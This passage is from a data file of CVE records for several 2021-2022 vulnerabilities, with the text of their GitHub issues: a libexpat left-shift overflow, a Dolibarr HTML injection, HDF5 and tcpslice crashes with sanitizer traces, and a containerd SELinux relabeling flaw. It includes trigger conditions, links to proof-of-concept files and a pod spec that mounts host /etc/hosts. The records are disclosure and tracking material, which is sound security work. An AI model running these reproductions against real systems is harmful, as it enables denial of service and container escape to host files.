"OR" } ], "operator": null } ]
[ "682" ]
682
https://github.com/libexpat/libexpat/issues/531
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libexpat", "libexpat" ]
Back in 2015, Tyson Smith (@tysmith) [reported](https://bugzilla.mozilla.org/show_bug.cgi?id=1217609) invalid left shifts at 5 places in libexpat to Mozilla. 3 of these bad shifts had also been [reported](https://sourceforge.net/p/expat/bugs/529/) by Dingbao Xie (@xiedingbao), and been fixed in commit 2106ee4050fd0d30e776e1c5a48937bb76a17074 and release 2.2.0 in 2016; this ticket is meant to explain my evaluation of those 2 remaining bad shifts, as a reference, for anyone interested, and to allow review and correction as needed. For short, there is security issue in libexpat that affects even the oldest releases, >=1.95.7 at least (commit b28869898a5bc870e620edce09a5e65b4d556ba7). Probably not one to panic about. The [related code](https://github.com/libexpat/libexpat/blob/60bbbe560cb50e6bfbf93ed765aaeb38335487c3/expat/lib/xmlparse.c#L3417-L3430) in function `storeAtts` in `lib/xmlparse.c` is this: ```c int nsAttsSize = (int)1 << parser->m_nsAttsPower; [..] nsAttsSize = (int)1 << parser->m_nsAttsPower; [..] temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts, nsAttsSize * sizeof(NS_ATT)); ``` It should be noted that: - The related code is triggered by XML documents that contain tags with prefixed attributes (e.g. `<r xmlns:a="[..]" a:a123="[..]" [..] />`. - The `(int)` cast doesn't do anything, `1` is `int` by default. - A left shift on signed int by >=31 bits is undefined behavior for `sizeof(int)==4`. - For the multiplication in `nsAttsSize * sizeof(NS_ATT)`: - `sizeof` returns a `size_t`, unsigned and larger or equal to `int` in size, depending on machine architecture. - signed `nsAttsSize` is promoted to unsigned(!) `size_t` in context of that multiplication. - The value of `m_nsAttsPower` is derived from the number of prefixed attributes in the tag. If we include the namespace declaration attribute in that number, the math is `atts_power := int(math.log2(atts_count - 1)) + 2` (thinking Python). So to see `m_nsAttsPower` value 29 in memory, we need 2^(29-2)+1 prefixed XML attributes. From here on, behavior of the code depends on the machine architecture, in particular the sizes of types `int` and `size_t`; so we get different behavior on e.g. 32bit x86 than on 64bit amd64. In detail: ``` | x86 (32bit int and size_t) | amd64 (32bit int, 64bit size_t) ------------------+------------------------------------+--------------------------------- m_nsAttsPower 29 | (size_t)(1 << 29) * (4+4+4) | (size_t)(1 << 29) * (8+8+8) | => 2_147_483_648, mult overflow | >= 12_884_901_888 | => allocating too few bytes | => mallocs okay or returns NULL | | m_nsAttsPower 30 | (size_t)(1 << 30) * (4+4+4) | (size_t)(1 << 30) * (8+8+8) | => 0, mult overflow | => 25_769_803_776 | => realloc acts as free | => mallocs okay or returns NULL | | m_nsAttsPower 31 | (size_t)(1 << 31) * (4+4+4) | (size_t)(1 << 31) * (8+8+8) | => undefined behavior | => undefined behavior | | ``` To summarize the problem, - `m_nsAttsPower<=28` is fine on both platforms. - `m_nsAttsPower==29` will allocate too few bytes on 32bit, fine on 64bit. - `m_nsAttsPower==30` makes realloc act like free on 32bit, fine on 64bit. - `m_nsAttsPower>=31` is undefined behavior is denial of service (or more) on both platforms. The fix will have these parts: - First, detect and prevent left shifts by `sizeof(int) * 8 - 1` or more bits. - Second, detect and prevent integer overflow on `nsAttsSize * sizeof(NS_ATT)`. - (Third, turn `int` into `unsigned int` to make the code more clear, close the door to undefined behavior, and allow even `1u << 31`.) A pull request and likely a CVE are upcoming, and there will be a soon release 2.4.3. Because thy payload to trigger the vulnerability is in the gigabytes, *remote* exploitability will hopefully be stopped by upload limits in most setups, before even getting to libexpat. Even when generating attribute names using the base58 scheme for short non-overlapping names, an XML file with e.g. 2^29+1 attributes on a single tag is ~6.5 GiB in size. I have a Python >=3.6 script to create XML files like that online at https://gist.github.com/hartwork/ccad94d00c4193e05ab57de70021e6ee. Best, Sebastian
[CVE-2021-45960] A large number of prefixed XML attributes on a single tag can crash libexpat (troublesome left shifts by >=29 bits in function storeAtts)
https://api.github.com/repos/libexpat/libexpat/issues/531/comments
4
2021-12-30T19:24:38Z
2022-01-07T22:17:02Z
https://github.com/libexpat/libexpat/issues/531
1,091,269,578
531
2,935
CVE-2022-22293
2022-01-02T00:15:09.673
admin/limits.php in Dolibarr 7.0.2 allows HTML injection, as demonstrated by the MAIN_MAX_DECIMALS_TOT parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Dolibarr/dolibarr/issues/20237" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mustgundogdu/Research/blob/main/Dolibar_7.0.2-StoredXSS/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Dolibarr/dolibarr/issues/20237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mustgundogdu/Research/blob/main/Dolibar_7.0.2-StoredXSS/README.md" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:7.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "05824B6D-C047-4328-8FE0-AC05ECC760FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Dolibarr/dolibarr/issues/20237
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Dolibarr", "dolibarr" ]
### Bug There is a proof of concept for a XSS on admin/limits.php for Dolibarr 7.0.2 (see https://github.com/mustgundogdu/Research/tree/main/Dolibar_7.0.2-StoredXSS). It would be useful to have a check/ statement if the problem still exist in newer versions, or it is already fixed (and if so, in which version). ### Environment Version 7.0.2 ### Environment OS _No response_ ### Environment Web server _No response_ ### Environment PHP _No response_ ### Environment Database _No response_ ### Environment URL(s) _No response_ ### Expected and actual behavior _No response_ ### Steps to reproduce the behavior _No response_ ### Attached files _No response_
HTML injection in admin/limits.php, Dolibarr v 7.0.2
https://api.github.com/repos/Dolibarr/dolibarr/issues/20237/comments
2
2022-03-01T13:37:10Z
2022-03-01T14:08:39Z
https://github.com/Dolibarr/dolibarr/issues/20237
1,155,350,983
20,237
2,936
CVE-2021-45829
2022-01-03T22:15:11.153
HDF5 1.13.1-1 is affected by: segmentation fault, which causes a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1317" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1317" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hdfgroup:hdf5:1.13.1-1:*:*:*:*:*:*:*", "matchCriteriaId": "3E27D5C4-8DAF-4738-9B3A-9C3E0E867F5E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "404" ]
404
https://github.com/HDFGroup/hdf5/issues/1317
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "HDFGroup", "hdf5" ]
**Version:** ``` Version 1.13.1-1 ``` **System information** ``` Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ``` **command:** ``` h5stat POC8 ``` [POC8.zip](https://github.com/HDFGroup/hdf5/files/7739339/POC8.zip) **result** ``` segmentation fault ``` **ASAN information** ``` Legend: code, data, rodata, value Stopped reason: SIGSEGV __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102 3102 malloc.c: No such file or directory. gdb-peda$ bt #0 __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102 #1 0x000055555566ff52 in H5MM_xfree (mem=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5MM.c:557 #2 0x0000555555693fb1 in H5O__link_reset (_mesg=0x55555594d4b0) at /home/zxq/CVE_testing/source/hdf5/src/H5Olink.c:564 #3 0x0000555555695d8d in H5O__msg_reset_real (type=<optimized out>, type=<optimized out>, native=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:589 #4 H5O_msg_reset (type_id=type_id@entry=0x6, native=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:556 #5 0x0000555555631d78 in H5G__link_release_table (ltable=ltable@entry=0x7fffffffd990) at /home/zxq/CVE_testing/source/hdf5/src/H5Glink.c:517 #6 0x0000555555802355 in H5G__compact_iterate (oloc=oloc@entry=0x55555594d3d8, linfo=<optimized out>, idx_type=idx_type@entry=H5_INDEX_NAME, order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30) at /home/zxq/CVE_testing/source/hdf5/src/H5Gcompact.c:412 #7 0x000055555563887f in H5G__obj_iterate (grp_oloc=grp_oloc@entry=0x55555594d3d8, idx_type=H5_INDEX_NAME, order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=op@entry=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30) at /home/zxq/CVE_testing/source/hdf5/src/H5Gobj.c:661 #8 0x0000555555630b64 in H5G_visit (loc=loc@entry=0x7fffffffdbc0, group_name=<optimized out>, idx_type=<optimized out>, order=H5_ITER_INC, op=<optimized out>, op_data=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Gint.c:1243 #9 0x00005555557ae1f5 in H5VL__native_link_specific (obj=<optimized out>, loc_params=0x7fffffffdc40, args=0x7fffffffdc70, dxpl_id=<optimized out>, req=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLnative_link.c:374 #10 0x000055555579d200 in H5VL__link_specific (cls=<optimized out>, req=0x0, dxpl_id=0xb00000000000008, args=0x7fffffffdc70, loc_params=0x7fffffffdc40, obj=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5305 #11 H5VL_link_specific (vol_obj=vol_obj@entry=0x55555594b890, loc_params=loc_params@entry=0x7fffffffdc40, args=args@entry=0x7fffffffdc70, dxpl_id=0xb00000000000008, req=req@entry=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5339 #12 0x0000555555664b41 in H5Lvisit_by_name2 (loc_id=loc_id@entry=0x100000000000000, group_name=group_name@entry=0x5555558166e4 "/", idx_type=H5_INDEX_NAME, order=H5_ITER_INC, op=op@entry=0x55555557eda0 <traverse_cb>, op_data=op_data@entry=0x7fffffffdd40, lapl_id=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5L.c:1984 #13 0x000055555558040e in traverse (fields=0x1f, visitor=0x7fffffffdd00, recurse=0x1, visit_start=<optimized out>, grp_name=0x5555558166e4 "/", file_id=0x100000000000000) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:288 #14 h5trav_visit (fid=0x100000000000000, grp_name=0x5555558166e4 "/", visit_start=<optimized out>, recurse=<optimized out>, visit_obj=<optimized out>, visit_lnk=<optimized out>, udata=0x7fffffffde80, fields=0x1f) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:1057 #15 0x0000555555563727 in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe308) at /home/zxq/CVE_testing/source/hdf5/tools/src/h5stat/h5stat.c:1795 #16 0x00007ffff7c930b3 in __libc_start_main (main=0x555555562f20 <main>, argc=0x2, argv=0x7fffffffe308, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe2f8) at ../csu/libc-start.c:308 #17 0x0000555555563a3e in _start () ```
segmentation fault in h5stat
https://api.github.com/repos/HDFGroup/hdf5/issues/1317/comments
2
2021-12-18T13:57:17Z
2022-11-21T21:47:13Z
https://github.com/HDFGroup/hdf5/issues/1317
1,083,838,419
1,317
2,937
CVE-2021-41043
2022-01-05T12:15:08.127
Use after free in tcpslice triggers AddressSanitizer, no other confirmed impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@tcpdump.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-tcpdump-group/tcpslice/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-tcpdump-group/tcpslice/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tcpdump:tcpslice:*:*:*:*:*:*:*:*", "matchCriteriaId": "DDBBF07F-5EB3-4EA1-BE35-8BD711C50DF2", "versionEndExcluding": "1.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/the-tcpdump-group/tcpslice/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "the-tcpdump-group", "tcpslice" ]
### Tested on: version 1.5-PRE-GIT version 1.2a3 ### Command: tcpslice -w a.txt heap.pcap Segmentation fault ### Results: ==1676569==ERROR: AddressSanitizer: heap-use-after-free on address 0x617000000160 at pc 0x7ffff761fa7d bp 0x7fffffffd700 sp 0x7fffffffce90 WRITE of size 56 at 0x617000000160 thread T0 #0 0x7ffff761fa7c in vsnprintf (/lib/x86_64-linux-gnu/libasan.so.5+0x9fa7c) #1 0x7ffff7620036 in __snprintf_chk (/lib/x86_64-linux-gnu/libasan.so.5+0xa0036) #2 0x7ffff75594ee in pcap_dump_open (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x244ee) #3 0x555555559ea4 in extract_slice tcpslice.c:882 #4 0x555555559ea4 in main tcpslice.c:312 #5 0x7ffff736a0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #6 0x55555555eadd in _start (/home/constantine/tcpslice/tcpslice+0xaadd) 0x617000000160 is located 224 bytes inside of 664-byte region [0x617000000080,0x617000000318) freed by thread T0 here: #0 0x7ffff768d7cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf) #1 0x555555559d8a in get_next_packet tcpslice.c:747 #2 0x555555559d8a in extract_slice tcpslice.c:879 #3 0x555555559d8a in main tcpslice.c:312 previously allocated by thread T0 here: #0 0x7ffff768ddc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6) #1 0x7ffff7545bea (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x10bea) #2 0x64656e696665646d (<unknown module>) SUMMARY: AddressSanitizer: heap-use-after-free (/lib/x86_64-linux-gnu/libasan.so.5+0x9fa7c) in vsnprintf Shadow bytes around the buggy address: 0x0c2e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c2e7fff8020: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd 0x0c2e7fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2e7fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2e7fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2e7fff8060: fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1676569==ABORTING ### PoC: [heap.pcap.zip](https://github.com/the-tcpdump-group/tcpslice/files/6740598/heap.pcap.zip)
Heap use after free
https://api.github.com/repos/the-tcpdump-group/tcpslice/issues/11/comments
4
2021-06-30T11:50:26Z
2025-02-07T21:36:36Z
https://github.com/the-tcpdump-group/tcpslice/issues/11
933,619,981
11
2,938
CVE-2021-43816
2022-01-05T19:15:08.717
containerd is an open source container runtime. On installations using SELinux, such as EL8 (CentOS, RHEL), Fedora, or SUSE MicroOS, with containerd since v1.5.0-beta.0 as the backing container runtime interface (CRI), an unprivileged pod scheduled to the node may bind mount, via hostPath volume, any privileged, regular file on disk for complete read/write access (sans delete). Such is achieved by placing the in-container location of the hostPath volume mount at either `/etc/hosts`, `/etc/hostname`, or `/etc/resolv.conf`. These locations are being relabeled indiscriminately to match the container process-label which effectively elevates permissions for savvy containers that would not normally be able to access privileged host files. This issue has been resolved in version 1.5.9. Users are advised to upgrade as soon as possible.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/containerd/containerd/commit/a731039238c62be081eb8c31525b988415745eea" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/containerd/containerd/issues/6194" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/containerd/containerd/security/advisories/GHSA-mvff-h3cj-wj9c" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dweomer/containerd/commit/f7f08f0e34fb97392b0d382e58916d6865100299" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GD5GH7NMK5VJMA2Y5CYB5O5GTPYMWMLX/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MPDIZMI7ZPERSZE2XO265UCK5IWM7CID/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/containerd/containerd/commit/a731039238c62be081eb8c31525b988415745eea" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/containerd/containerd/issues/6194" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/containerd/containerd/security/advisories/GHSA-mvff-h3cj-wj9c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dweomer/containerd/commit/f7f08f0e34fb97392b0d382e58916d6865100299" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GD5GH7NMK5VJMA2Y5CYB5O5GTPYMWMLX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MPDIZMI7ZPERSZE2XO265UCK5IWM7CID/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:*", "matchCriteriaId": "43387595-2EE9-4BCB-BA40-899372BAFD60", "versionEndExcluding": "1.5.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.5.1", "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "51312F5E-E77D-4714-A47A-EB2900F91852", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:beta0:*:*:*:*:*:*", "matchCriteriaId": "2C477ED1-29F2-47CC-B523-331FE4052336", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "2DD59A2E-2AF5-4D24-A0BD-F9A7C2064A91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "6D819271-9946-4A69-8EF7-AFF8AAA226CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "F87C27FC-1AE4-45BA-BCF5-D5C2AEC3F3E4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "3F6FA16C-59DA-42A7-A75C-5E8FB0E83453", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:rc0:*:*:*:*:*:*", "matchCriteriaId": "2829C988-52D0-42A6-B063-B789046DBC58", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "459C3B7F-4875-42A1-B242-A342218CEFD4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "6C93E100-A2D4-4781-8C36-4DBCFD704CB2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:containerd:1.5.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F43624CC-D1D3-4FF0-8D97-20E190A9A56E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "281" ]
281
https://github.com/containerd/containerd/issues/6194
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "containerd", "containerd" ]
### Description When running rke2/k3s pointing at our bundled (or stock) containerd, one can apply an unprivileged pod that relabels `/etc/hosts` on the host by mounting a hostPath `/etc/hosts` volume at the same location in the container: ```yaml apiVersion: v1 kind: Pod metadata: name: test-agnhost spec: containers: - image: k8s.gcr.io/e2e-test-images/agnhost:2.32 name: agnhost-1 args: - pause volumeMounts: - mountPath: /etc/hosts name: host-etc-hosts volumes: - name: host-etc-hosts hostPath: path: /etc/hosts type: FileOrCreate ``` ### Steps to reproduce the issue 1. Install RKE2 on CentOS 8.x with SELinux enabled (the default when installed via https://get.rke2.io) 2. Establish that your `/etc/hosts` is correctly labeled: ``` [vagrant@node-1 ~]$ ls -alZ /etc/hosts -rw-r--r--. 1 root root system_u:object_r:net_conf_t:s0 182 Nov 2 00:11 /etc/hosts [vagrant@node-1 ~]$ ``` 3. Apply this pod spec: ```yaml apiVersion: v1 kind: Pod metadata: name: test-agnhost spec: containers: - image: k8s.gcr.io/e2e-test-images/agnhost:2.32 name: agnhost-1 args: - 